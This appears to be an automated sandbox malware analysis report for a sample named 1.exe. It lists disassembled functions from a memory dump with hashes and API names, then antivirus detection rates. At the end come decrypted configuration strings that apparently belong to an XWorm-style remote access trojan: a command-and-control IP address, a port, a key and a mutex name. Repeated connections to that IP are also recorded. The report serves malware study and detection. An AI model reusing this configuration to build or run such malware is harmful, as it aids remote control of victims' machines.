Function 00C7209A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C7216E
KillTimer.USER32(?,00000002), ref: 00C7219D

Strings

, xrefs: 00C72152

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: KillRectTimerWindow
String ID:
API String ID: 1987732032-3916222277
Opcode ID: 1269572361bf0f1088baf72673ff61e4db5b5f4f893455f837a3eeb2c89b2892
Instruction ID: c340c8a852625c4a65c6db23ae6ff3d2b6d275e6a24bd4e9168bfc7ff6a659d2
Opcode Fuzzy Hash: 1269572361bf0f1088baf72673ff61e4db5b5f4f893455f837a3eeb2c89b2892
Instruction Fuzzy Hash: F831AF71A006059FCB20DF68C885AAEB7F1FF88301F10856EE56E97241EB74AD41DF50

Function 00C1077E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C10785

Part of subcall function 00BD800E: MoveToEx.GDI32(?,?,?,?), ref: 00BD8038
Part of subcall function 00BD800E: MoveToEx.GDI32(?,?,?,?), ref: 00BD8049

Part of subcall function 00BD7A71: MoveToEx.GDI32(?,?,?,00000000), ref: 00BD7A8E
Part of subcall function 00BD7A71: LineTo.GDI32(?,?,?), ref: 00BD7A9D

Part of subcall function 00BD8606: SelectObject.GDI32(?,00000000), ref: 00BD862C
Part of subcall function 00BD8606: SelectObject.GDI32(?,?), ref: 00BD8642

Strings

iii, xrefs: 00C107B4
iii, xrefs: 00C107A7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Move$ObjectSelect$H_prolog3Line
String ID: iii$iii
API String ID: 3726201289-3499908146
Opcode ID: eaf07ac5a6dfa53e3c906cf78fe1dad6c057a93800b7d0ac9c1cc843d65c11c0
Instruction ID: 8a11470fd2e9508cbb50afed6e7e71abd5644d62e6544ad16258e224f0679415
Opcode Fuzzy Hash: eaf07ac5a6dfa53e3c906cf78fe1dad6c057a93800b7d0ac9c1cc843d65c11c0
Instruction Fuzzy Hash: 21313075900209EFCF02EFA4C9529EEB7B6AF58310F10406AF911A7391EB719B11DBA5

Function 00BD23E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD243C
_memmove.LIBCMT ref: 00BD2482

Part of subcall function 00BD2300: std::_Xinvalid_argument.LIBCPMT ref: 00BD2316

Strings

string too long, xrefs: 00BD2437

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: aa70c7c030a37a38f832a46e3664d0ecabe1286e36bed3b8a5e9a8766eadd141
Instruction ID: f628862bf679a14734edd92213a118b06ea5d286ddfe969f229927be34b931ce
Opcode Fuzzy Hash: aa70c7c030a37a38f832a46e3664d0ecabe1286e36bed3b8a5e9a8766eadd141
Instruction Fuzzy Hash: E521CF703016D08BDB258F6C99C0A2AF7E5EFB1710B2409ABFAD1C7781E761DC409BA5

Function 00BF14B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF14C0
SetRectEmpty.USER32(?), ref: 00BF1550

Strings

Afx:ToolBar, xrefs: 00BF1556

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyH_prolog3_Rect
String ID: Afx:ToolBar
API String ID: 2941628838-177727192
Opcode ID: 942ca7696a7477f92325d4cdb18e5d9e95c70d8f1cc4c3a9d231d55baf54cf46
Instruction ID: e26139cf13bac6abaf7b27bb52568e21405ae3b1b84af8d29d3dd8cf34081554
Opcode Fuzzy Hash: 942ca7696a7477f92325d4cdb18e5d9e95c70d8f1cc4c3a9d231d55baf54cf46
Instruction Fuzzy Hash: 4121AE71A1061A9FCB00DFB8C896BEE7BE8FF58350F14096AF515E7281DB349904CBA0

Function 00BD2610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD2624

Part of subcall function 00CDC644: std::exception::exception.LIBCMT ref: 00CDC659
Part of subcall function 00CDC644: __CxxThrowException@8.LIBCMT ref: 00CDC66E

_memmove.LIBCMT ref: 00BD266C

Strings

string too long, xrefs: 00BD261F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: string too long
API String ID: 22950630-2556327735
Opcode ID: c3245589318860d35e7e2a8aff5fa6c7f6acc36fd28141022dc0e6190f943a5d
Instruction ID: 31143141ada7e21be5085a57a77b4a875b51dcd0e256ce315ee48d24cac2ce91
Opcode Fuzzy Hash: c3245589318860d35e7e2a8aff5fa6c7f6acc36fd28141022dc0e6190f943a5d
Instruction Fuzzy Hash: AC11E9711087505FEB24EF78A8C1A6AF7D8EF71724F100A6FE09783782E671E84486A5

Function 00CCB70A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CCB718

Part of subcall function 00CC6553: __getptd.LIBCMT ref: 00CC6566

___crtGetStringTypeA.LIBCMT ref: 00CCB772

Strings

, xrefs: 00CCB785

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Locale$StringTypeUpdateUpdate::____crt__getptd
String ID:
API String ID: 3839601089-3916222277
Opcode ID: 78f9ca2de24f96e60767bfcf44f283aa48ee51f93af03a862aca7532cc73329b
Instruction ID: 92f4d968fa7debd62bb38ec2bd3f6219a6ac7b66eed03c5a11d84fa97eb65d1a
Opcode Fuzzy Hash: 78f9ca2de24f96e60767bfcf44f283aa48ee51f93af03a862aca7532cc73329b
Instruction Fuzzy Hash: 9921B331910249ABDF11CBE4C946FAD7BB5AF80314F14859CE825AB2D1E771CF46C760

Function 00BF3438 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF343F

Part of subcall function 00C57C9D: __EH_prolog3.LIBCMT ref: 00C57CA4

Part of subcall function 00C579CF: __EH_prolog3.LIBCMT ref: 00C579D6

Strings

LargeIcons, xrefs: 00BF34E0
%sMFCToolBarParameters, xrefs: 00BF3472

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3
String ID: %sMFCToolBarParameters$LargeIcons
API String ID: 431132790-2076908790
Opcode ID: bf4b0a0cf5993838309cbfaf71243201835abe8483b0a4f6fc0329c177a44971
Instruction ID: 397f86ba5d8cfd6070dccd4325d182095ca7794e92647fedffa4de88be164ad0
Opcode Fuzzy Hash: bf4b0a0cf5993838309cbfaf71243201835abe8483b0a4f6fc0329c177a44971
Instruction Fuzzy Hash: 8F21F574A00249DFCF01EFA4C845FBDBBF4AF54700F144099F5059B392D6718A84DB51

Function 00C21539 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00C21581
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00C21593

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

N, xrefs: 00C2153E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Exception@8H_prolog3Throw
String ID: N
API String ID: 2952110909-1130791706
Opcode ID: 6e899b41c956ab8f26cd90fe189756f2cfb2111f3d1c5c7e0324609ce7304e7a
Instruction ID: 0798cbebc747944691a25cd7ef566a56f7d9f7886cfe5d969e4d6c6d939b6148
Opcode Fuzzy Hash: 6e899b41c956ab8f26cd90fe189756f2cfb2111f3d1c5c7e0324609ce7304e7a
Instruction Fuzzy Hash: 12114C31300719AFDB219F64DC80BAAB7A5FFD4311F144239FA164A5A1DB70CE11DB94

Function 00BD25A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD25AF

Part of subcall function 00CDC691: std::exception::exception.LIBCMT ref: 00CDC6A6
Part of subcall function 00CDC691: __CxxThrowException@8.LIBCMT ref: 00CDC6BB

_memmove.LIBCMT ref: 00BD25E5

Strings

invalid string position, xrefs: 00BD25AA

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: a11379b561537d620f0caaf45435281f830c7efedfc62f4750695bffaa2e6c6c
Instruction ID: 292a2f92a712e445f667eb804f7ce4ff84e30ae0d918d109ae8dfa631cb2be57
Opcode Fuzzy Hash: a11379b561537d620f0caaf45435281f830c7efedfc62f4750695bffaa2e6c6c
Instruction Fuzzy Hash: 5C01A7343007804BD7258B2CFDA0A1AF3E69BE4704B244AAED182C7745E771DC8293A4

Function 00BFEAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDE7AA: GetModuleHandleA.KERNEL32(?,?,00BDE892,InitCommonControlsEx,00000000,?,00BDF568,00080000,00008000,?,?,00BE2235,?,00080000,?), ref: 00BDE7B8
Part of subcall function 00BDE7AA: LoadLibraryA.KERNEL32(?,?,00BDE892,InitCommonControlsEx,00000000,?,00BDF568,00080000,00008000,?,?,00BE2235,?,00080000,?), ref: 00BDE7C8

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00BFEB07
_memset.LIBCMT ref: 00BFEB20

Strings

DllGetVersion, xrefs: 00BFEB01

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc_memset
String ID: DllGetVersion
API String ID: 3385804498-2861820592
Opcode ID: 44e9ac9f257564a2a646d87985c3b6f2897b11f1b261485b22e587902e34ee05
Instruction ID: 95fdc4a14c5c665d1263c86373dfcc15f6af1e0e4a3a0ea9d1750f51f370922a
Opcode Fuzzy Hash: 44e9ac9f257564a2a646d87985c3b6f2897b11f1b261485b22e587902e34ee05
Instruction Fuzzy Hash: 65019E71A002189BD710EBA9D885BAEB7E8AB08754F400165FB11E72A2E770DD049BA0

Function 00C367D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryclipboardCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C367DF
RegisterClipboardFormatA.USER32(00000010), ref: 00C36828

Strings

ToolbarButton%p, xrefs: 00C36816

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClipboardFormatH_prolog3Register
String ID: ToolbarButton%p
API String ID: 1070914459-899657487
Opcode ID: bbe6ee11e8b7b85b1e05ca585dd691fbecb962f1e9496a2fea25dc7d816bf22b
Instruction ID: aa21d7f4eefae9da962c994fb36db36547a6195d8f9a8e38dc75ac6e48b32e2e
Opcode Fuzzy Hash: bbe6ee11e8b7b85b1e05ca585dd691fbecb962f1e9496a2fea25dc7d816bf22b
Instruction Fuzzy Hash: 5AF044798112459ACF11EBB4DC05BAEB7B4AF04710F00455AF1A0A7393EB786A05CB66

Function 00CCCD0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,00CCCD44,00000000,00000000,00000000,00000000,00000000,00CD8744,?,00CCDBA8,00000003,00CCCF21,00D26700,0000000C,00CCCFDD,00BD7426), ref: 00CCCD16
__invoke_watson.LIBCMT ref: 00CCCD32

Strings

PNSw, xrefs: 00CCCD16

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: PNSw
API String ID: 4034010525-3485112956
Opcode ID: 600ca4fa26f1f2797f0177ee1df761083fc5478eeeef0ac87cd50f75042873e2
Instruction ID: b8a0efe1fdce4c9dcad19b01a75378b672b8bcc4673ba9bb982507045d0746bc
Opcode Fuzzy Hash: 600ca4fa26f1f2797f0177ee1df761083fc5478eeeef0ac87cd50f75042873e2
Instruction Fuzzy Hash: 04E0EC7201420DBBCF022FA1DC49EAA3F6AEF44750B544428FE1A84031D632CD71EB91

Function 00BE37A7 Relevance: 5.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00BE3806
LeaveCriticalSection.KERNEL32(?), ref: 00BE3816
LocalFree.KERNEL32(?), ref: 00BE381F
TlsSetValue.KERNEL32(?,00000000), ref: 00BE3831

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 129118e14888d2c6d75247b394a8a4b6bcb6cd64f15026e700428b76b2f01ae7
Instruction ID: 41f156ec4f29a644008d91439858c8a4bd119d543b9ff9a939ed3d71b46b1339
Opcode Fuzzy Hash: 129118e14888d2c6d75247b394a8a4b6bcb6cd64f15026e700428b76b2f01ae7
Instruction Fuzzy Hash: 7D1142B5600644EFD724DF6AC889F5AB7E4FF45B16F2080A9E1428B6A1CB71EE40CB11

Function 00BFDA10 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA4A
InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA5C
LeaveCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA69
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA79

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 130808012a1d0660fb2a8ddb18e84cebbc37cd2e73cd6bb8224bc7f14171ee11
Instruction ID: c01a53d880a90a147e4ab8de6424085c45c5bd4f0369eee3b5f2caa6b7f8cbab
Opcode Fuzzy Hash: 130808012a1d0660fb2a8ddb18e84cebbc37cd2e73cd6bb8224bc7f14171ee11
Instruction Fuzzy Hash: DAF0F67360434CAFDB101B55DD89B29F7ABEBE031AF011016F34047211DA749A89C67A

Function 00BE3355 Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D32490,?,?,00000000,?,00BE3901,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE3363
TlsGetValue.KERNEL32(00D32474,?,?,00000000,?,00BE3901,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE3377
LeaveCriticalSection.KERNEL32(00D32490,?,?,00000000,?,00BE3901,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE338D
LeaveCriticalSection.KERNEL32(00D32490,?,?,00000000,?,00BE3901,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE3398

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 878d035fe1e2ea8e647d7378ad71286895992402bbec5af5591dec94ceb5e537
Instruction ID: 71999bb6fbec4f6439a5b42f3e6058d792b51894b701b195625a1ab133dcea8e
Opcode Fuzzy Hash: 878d035fe1e2ea8e647d7378ad71286895992402bbec5af5591dec94ceb5e537
Instruction Fuzzy Hash: 07F054B7200544DFD7208F55DCCCE1EBBE9EB947603164495F40597125DB31F901CA65

Source: 1.exe	Virustotal: Detection: 18%			Perma Link
Source: 1.exe	ReversingLabs: Detection: 13%

Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: 45.207.215.58
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: 7000
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: <123456789>
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: Devilsuncle V5.6
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: USB.exe

Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
Source: unknown	TCP traffic detected without corresponding DNS query: 45.207.215.58
